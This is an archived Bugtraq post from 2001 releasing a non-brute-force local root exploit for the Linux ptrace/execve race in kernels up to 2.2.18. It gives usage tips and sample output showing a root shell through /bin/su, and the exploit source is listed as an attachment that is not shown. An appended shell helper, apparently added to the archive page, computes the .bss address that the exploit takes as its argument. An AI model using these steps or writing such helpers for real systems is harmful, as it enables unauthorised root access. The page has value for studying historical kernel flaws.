Bugtraq mailing list archives

ptrace/execve race condition exploit (non brute-force)


From: Wojciech Purczynski <wp () ELZABSOFT PL>
Date: Tue, 27 Mar 2001 14:05:54 +0200


Hi,

Here is an exploit for the ptrace/execve race condition bug in Linux kernels up
to 2.2.18.

It works even on openwall-patched kernels (including the broken fix in 2.2.18ow4)
if you use the address of the BSS section in memory (use objdump -h /suid/binary
to get the .bss section address).

It does not use brute force! It makes only one attempt: the parent process detects
the exact moment of the context switch after the child goes to sleep in execve.

If you have some problems, ensure that the suid binary you want to sploit does
not exist in the disk cache.

For more info read comments in the source code.

It has been broken in two places.

Sample output:

[wp@wp /tmp]$ uname -a
Linux wp.local.elzabsoft.pl 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
[wp@wp /tmp]$ objdump -h /bin/su | grep .bss
  8 .rel.bss      00000030  08048ca8  08048ca8  00000ca8  2**2
 21 .bss          000000d4  0804bf04  0804bf04  00002f04  2**2
[wp@wp /tmp]$ find / >/dev/null 2>&1
[wp@wp /tmp]$ ./epcs /bin/su 0x0804bf04
Bug exploited successfully.
sh-2.03#

It works with any suid binary.

Cheers,
wp

+---------------------------------------------------------+
| Wojciech Purczyński                 Linux Administrator |
| wp () elzabsoft pl             http://www.elzabsoft.pl/~wp |
| +48604432981        http://www.elzabsoft.pl/~wp/gpg.asc |
+---------------------------------------------------------+

Attachment: epcs.c
Description: epcs
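The post tells you to read the .bss address off `objdump -h`, and its own sample output shows why `grep .bss` is not enough: the regex also matches `.rel.bss`, which sits at a different address. The helper below, written for this archive page and not part of the post or of epcs.c, parses an `objdump -h` section table and prints the VMA of the section whose name is exactly `.bss`, failing if there is none. The function names and the embedded sample listing (modelled on the /bin/su lines quoted in the post, not captured from a live system) are assumptions of this example.

```shell
#!/bin/sh
# bss_vma_from_objdump: read an `objdump -h` section table on stdin and print
# the VMA of the .bss section, prefixed with 0x so it can be passed as an
# address argument. Column layout of objdump -h is:
#   Idx Name Size VMA LMA "File off" Algn
# so $2 is the section name and $4 the VMA. The exact-match test on $2 skips
# .rel.bss, .sbss and any other name that a plain `grep .bss` would also hit.
# Exit status is 1 when no .bss section is present.
bss_vma_from_objdump() {
    awk '$2 == ".bss" { print "0x" $4; found = 1 } END { exit found ? 0 : 1 }'
}

# bss_vma FILE: same thing for a real binary on disk (needs binutils installed).
bss_vma() {
    objdump -h "$1" | bss_vma_from_objdump
}

# Constructed sample (assumption for this example): the two lines the post
# shows for /bin/su, plus the table header objdump prints above them.
SAMPLE_OBJDUMP='/bin/su:     file format elf32-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  8 .rel.bss      00000030  08048ca8  08048ca8  00000ca8  2**2
 21 .bss          000000d4  0804bf04  0804bf04  00002f04  2**2'

# Prints 0x0804bf04, the value the post passes to ./epcs; .rel.bss is ignored.
printf '%s\n' "$SAMPLE_OBJDUMP" | bss_vma_from_objdump
```

Against a live binary, `bss_vma /bin/su` gives the argument for the exploit directly; on a binary with no `.bss` the function exits non-zero instead of silently printing the address of some other section.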

